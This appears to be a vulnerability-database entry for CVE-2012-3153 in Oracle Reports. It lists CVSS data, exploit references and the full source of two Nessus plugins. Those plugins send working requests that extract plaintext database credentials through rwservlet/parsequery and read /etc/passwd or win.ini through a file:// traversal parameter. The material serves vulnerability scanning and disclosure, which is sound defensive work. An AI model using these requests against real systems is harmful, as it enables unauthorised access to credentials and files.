Vulnerabilities > CVE-2012-3153 - Remote Security vulnerability in Oracle Fusion Middleware 11.1.1.4.0/11.1.1.6.0/11.1.2.0
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
NONE Summary
Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Servlet. NOTE: the previous information is from the October 2012 CPU. Oracle has not commented on claims from the original researcher that the PARSEQUERY function allows remote attackers to obtain database credentials via reports/rwservlet/parsequery, and that this issue occurs in earlier versions. NOTE: this can be leveraged with CVE-2012-3152 to execute arbitrary code by uploading a .jsp file.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 3 |
Exploit-Db
| description | Oracle Forms and Reports 11.1 - Remote Exploit. CVE-2012-3152. Remote exploit for jsp platform |
| file | exploits/jsp/remote/31253.rb |
| id | EDB-ID:31253 |
| last seen | 2016-02-03 |
| modified | 2014-01-29 |
| platform | jsp |
| port | 80 |
| published | 2014-01-29 |
| reporter | Mekanismen |
| source | https://www.exploit-db.com/download/31253/ |
| title | Oracle Forms and Reports 11.1 - Remote Exploit |
| type | remote |
Metasploit
| description | This module uses two vulnerabilities in Oracle Forms and Reports to get remote code execution on the host. The showenv url can be used to disclose information about a server. A second vulnerability that allows arbitrary reading and writing to the host filesystem can then be used to write a shell from a remote url to a known local path disclosed from the previous vulnerability. The local path being accessible from an URL allows an attacker to perform the remote code execution using, for example, a .jsp shell. This module was tested successfully on Windows and Oracle Forms and Reports 10.1. |
| id | MSF:EXPLOIT/MULTI/HTTP/ORACLE_REPORTS_RCE |
| last seen | 2020-06-05 |
| modified | 2017-08-29 |
| published | 2014-01-30 |
| references | |
| reporter | Rapid7 |
| source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_reports_rce.rb |
| title | Oracle Forms and Reports Remote Code Execution |
Nessus
NASL family CGI abuses NASL id ORACLE_REPORTS_PASSWORD_DISCLOSURE.NASL description Nessus was able to exploit a flaw in the Oracle Reports servlet parsequery function, and was able to retrieve the plaintext database credentials for one or more users. A remote attacker can exploit this vulnerability to gain unauthorized database access. last seen 2020-06-01 modified 2020-06-02 plugin id 73120 published 2014-03-20 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73120 title Oracle Reports Servlet Parsequery Function Remote Database Credentials Exposure code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(73120); script_version("1.8"); script_cvs_date("Date: 2019/11/26"); script_cve_id("CVE-2012-3153"); script_bugtraq_id(55961); script_xref(name:"EDB-ID", value:"31253"); script_name(english:"Oracle Reports Servlet Parsequery Function Remote Database Credentials Exposure"); script_summary(english:"Tries to exploit remote database credential exposure vulnerability"); script_set_attribute(attribute:"synopsis", value: "The remote host is running a web application that exposes database credentials."); script_set_attribute(attribute:"description", value: "Nessus was able to exploit a flaw in the Oracle Reports servlet parsequery function, and was able to retrieve the plaintext database credentials for one or more users. A remote attacker can exploit this vulnerability to gain unauthorized database access."); # http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/ script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c969a07f"); # https://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?87547c81"); script_set_attribute(attribute:"solution", value: "Apply the appropriate patch per the vendor's advisory."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2012-3153"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Oracle Forms and Reports Remote Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2012/10/16"); script_set_attribute(attribute:"patch_publication_date", value:"2012/10/16"); script_set_attribute(attribute:"plugin_publication_date", value:"2014/03/20"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("oracle_reports_detect.nbin"); script_require_keys("www/oracle_reports"); script_require_ports("Services/www", 8888); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("webapp_func.inc"); include("data_protection.inc"); appname = "Oracle Reports"; port = get_http_port(default:8888); install = get_install_from_kb( appname:'oracle_reports', port:port, exit_on_fail:TRUE ); # try and obtain a list of keymaps show_keymaps_uri = install['dir'] + '/rwservlet/showmap'; res = http_send_recv3(method:"GET", item:show_keymaps_uri, port:port, exit_on_fail:TRUE); if ("Reports Servlet Key Map" >!< res[2]) exit(0, "Unable to access Oracle Reports showmap function via "+build_url(port:port, qs:show_keymaps_uri)+"."); lines = split(res[2], sep:'\n', keep:FALSE); count = 0; custom_keymaps = make_list(); ignorable_keymaps = make_list( '%ENV_NAME%', 'barcodepaper', 'barcodeweb', 'breakbparam', 'charthyperlink_ias', 'charthyperlink_ids', 'distributionpaper', 'express', 'orqa', 'parmformjsp', 'pdfenhancements', 'report_defaultid', 'report_secure', 'run', 'runp', 'tutorial', 'xmldata' ); # get a list of non-default custom keymaps foreach line (lines) { if ("OraInstructionText" >!< line) continue; # table contains name the value, we want to skip over the values count++; if (!(count%2)) continue; item = eregmatch(pattern:"OraInstructionText>([^<]+)<", string:line); if (!isnull(item) && !isnull(item[1])) { keymap = chomp(item[1]); ignore = FALSE; foreach map (ignorable_keymaps) if (map == keymap) ignore = TRUE; if (!ignore) custom_keymaps = make_list(custom_keymaps, keymap); } } if (max_index(custom_keymaps) == 0) exit(0, "Failed to access Oracle Reports showmap function at "+build_url(port:port, qs:show_keymaps_uri)+"."); report = ''; parsequery_uri = install['dir'] + '/rwservlet/parsequery?'; foreach map (custom_keymaps) { res = http_send_recv3(method:"GET", item:parsequery_uri + map, port:port, exit_on_fail:TRUE); item = eregmatch(pattern:"userid=([^/]+)/([^@]+)@([^ \t]+)([ \t]|$)", string:res[2]); if (!isnull(item) && !isnull(item[1]) && !isnull(item[2]) && !isnull(item[3])) { pass = chomp(item[2]); # mask actual password except for first and last characters. if (strlen(pass) < 2) pass = crap(data:'*', length:6); else pass = strcat(pass[0], crap(data:'*', length:6), pass[strlen(pass)-1]); report += '\n Username : ' + data_protection::sanitize_user_enum(users:chomp(item[1])) + '\n Password : ' + pass + '\n Database : ' + chomp(item[3]) + '\n'; } } if (report != '') { report = '\nNessus was able to enumerate the following logins : \n' + report; if (report_verbosity > 0) security_warning(port:port, extra:report); else security_warning(port); } else audit(AUDIT_WEB_APP_NOT_AFFECTED, "Oracle Reports", build_url(port:port, qs:install['dir'] + '/rwservlet'));NASL family CGI abuses NASL id ORACLE_REPORTS_FILE_ACCESS.NASL description Nessus was able to exploit a file access vulnerability in the Oracle Reports servlet and retrieve to contents of a file. A remote attacker could use this vulnerability to read or write arbitrary files on the system, ultimately leading to remote code execution. last seen 2020-03-18 modified 2014-03-20 plugin id 73119 published 2014-03-20 reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73119 title Oracle Reports Servlet Remote File Access code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(73119); script_version("1.9"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/02/26"); script_cve_id("CVE-2012-3152"); script_bugtraq_id(55955); script_xref(name:"EDB-ID", value:"31253"); script_name(english:"Oracle Reports Servlet Remote File Access"); script_summary(english:"Tries to read a file"); script_set_attribute(attribute:"synopsis", value: "The remote web server hosts a web application that has a file access vulnerability."); script_set_attribute(attribute:"description", value: "Nessus was able to exploit a file access vulnerability in the Oracle Reports servlet and retrieve to contents of a file. A remote attacker could use this vulnerability to read or write arbitrary files on the system, ultimately leading to remote code execution."); # http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/ script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c969a07f"); # https://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?87547c81"); script_set_attribute(attribute:"solution", value: "Apply the appropriate patch per the vendor's advisory."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2012-3152"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Oracle Forms and Reports Remote Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2012/10/16"); script_set_attribute(attribute:"patch_publication_date", value:"2012/10/16"); script_set_attribute(attribute:"plugin_publication_date", value:"2014/03/20"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("oracle_reports_detect.nbin"); script_require_keys("www/oracle_reports"); script_require_ports("Services/www", 8888); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("webapp_func.inc"); include("data_protection.inc"); appname = "Oracle Reports"; port = get_http_port(default:8888); install = get_install_from_kb( appname:'oracle_reports', port:port, exit_on_fail:TRUE ); vuln_script = install['dir'] + '/rwservlet'; traversal = mult_str(str:"../", nb:15); file_list = make_list(traversal + "windows/win.ini", traversal + "winnt/win.ini", "c:/windows/win.ini", "c:/winnt/win.ini", "/etc/passwd"); exploit_request = NULL; exploit_response = NULL; foreach file (file_list) { exploit = vuln_script + "?destype=cache&desformat=html&JOBTYPE=rwurl&URLPARAMETER=%22file:///" + file + "%22"; res = http_send_recv3(method:"GET", item:exploit, port:port, exit_on_fail:TRUE); if ( # windows platforms ( "win.ini" >< file && ( "[Mail]" >< res[2] || "[fonts]" >< res[2] || "; for 16-bit app support" >< res[2] ) ) || # *nix ( "passwd" >< file && res[2] =~ " root:.*:0:[01]:" ) ) { exploit_request = exploit; exploit_response = chomp(res[2]); break; } } if (!isnull(exploit_request)) { report = NULL; filename = NULL; output = NULL; request = NULL; exploit_request = build_url(port:port, qs:exploit_request); if (report_verbosity > 0) { report = '\n' + 'Nessus was able to exploit the vulnerability with the following' + '\n' + 'request :' + '\n' + '\n' + ' ' + exploit_request + '\n'; if (report_verbosity > 1) { output = data_protection::redact_etc_passwd(output:exploit_response); filename = "win.ini"; if ("passwd" >< file) filename = "/etc/passwd"; request = make_list(req); } } security_report_v4(port:port, extra:report, severity:SECURITY_WARNING, request:request, file:filename, output:output); exit(0); } else audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(port:port, qs:'/'));
Packetstorm
data source https://packetstormsecurity.com/files/download/125236/oracle_reports_rce.rb.txt id PACKETSTORM:125236 last seen 2016-12-05 published 2014-02-18 reporter Mekanismen source https://packetstormsecurity.com/files/125236/Oracle-Forms-Reports-Remote-Code-Execution.html title Oracle Forms / Reports Remote Code Execution data source https://packetstormsecurity.com/files/download/124974/oracleparsequery-disclose.txt id PACKETSTORM:124974 last seen 2016-12-05 published 2014-01-28 reporter Dana Taylor source https://packetstormsecurity.com/files/124974/Oracle-Forms-And-Reports-Database-Disclosure.html title Oracle Forms And Reports Database Disclosure
Seebug
bulletinFamily exploit description No description provided by source. id SSV:85052 last seen 2017-11-19 modified 2014-07-01 published 2014-07-01 reporter Root source https://www.seebug.org/vuldb/ssvid-85052 title Oracle Forms and Reports - Remote Code Execution bulletinFamily exploit description No description provided by source. id SSV:84591 last seen 2017-11-19 modified 2014-07-01 published 2014-07-01 reporter Root source https://www.seebug.org/vuldb/ssvid-84591 title Oracle Forms and Reports 11.1 - Remote Exploit
References
- http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
- http://blog.netinfiltration.com/2014/01/19/upcoming-exploit-release-oracle-forms-and-reports-11g/
- http://seclists.org/fulldisclosure/2014/Jan/186
- http://www.exploit-db.com/exploits/31253
- http://www.mandriva.com/security/advisories?name=MDVSA-2013:150
- http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
- http://www.securityfocus.com/bid/55961
- https://exchange.xforce.ibmcloud.com/vulnerabilities/79296